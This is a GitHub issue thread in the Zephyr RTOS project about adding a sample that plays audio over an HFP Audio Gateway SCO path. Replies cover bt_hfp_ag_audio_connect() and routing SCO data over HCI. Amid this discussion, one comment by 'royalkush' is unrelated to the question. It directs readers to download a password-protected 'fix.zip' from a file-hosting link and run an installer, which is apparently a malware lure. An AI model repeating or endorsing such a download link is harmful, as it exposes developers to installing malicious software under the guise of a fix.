### ISSUE TITLE
add sample about sco audio path to play audio like a2dp

### ISSUE THREAD

**Issue by caogule** [zephyrproject-rtos/zephyr#77667]
This example HFP AG only implements the sco service-level connection,could you create an soc audio path to play music?Be grateful.

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lylezhu2012** [comment]
@caogule, Do you mean to establish an audio connection directly between the HFP AG and the HFP Unit? The function [`bt_hfp_ag_audio_connect()`](https://github.com/zephyrproject-rtos/zephyr/blob/main/include/zephyr/bluetooth/classic/hfp_ag.h#L690)  is used for this purpose.

**Comment by hongshui3000** [comment]
Another possibility is to implement it similar to btstack:
                                  SCO Data is be routed over HCI with `ENABLE_SCO_OVER_HCI` 
Good for msbc coded speech processing

**Comment by lylezhu2012** [comment]
> Another possibility is to implement it similar to btstack: SCO Data is be routed over HCI with `ENABLE_SCO_OVER_HCI` Good for msbc coded speech processing

Do you mean the SCO stream data is transferred over HCI instead of PCM pins of controller?

**Comment by hongshui3000** [comment]
> > Another possibility is to implement it similar to btstack: SCO Data is be routed over HCI with `ENABLE_SCO_OVER_HCI` Good for msbc coded speech processing
> 
> Do you mean the SCO stream data is transferred over HCI instead of PCM pins of controller?

Yes, the general baseband controller cannot decode MSBC and needs the host to process the audio data. PCM can also be transmitted to the host to add anti-packet loss algorithms
